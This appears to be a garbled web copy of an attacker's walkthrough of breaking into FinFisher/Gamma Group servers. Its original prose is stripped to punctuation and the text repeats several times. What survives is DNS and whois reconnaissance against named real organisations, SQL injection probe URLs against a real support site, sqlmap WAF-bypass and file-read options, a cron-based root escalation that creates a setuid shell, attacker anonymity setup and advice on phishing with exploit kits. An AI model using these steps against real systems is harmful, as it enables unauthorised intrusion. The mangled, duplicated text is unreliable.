The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
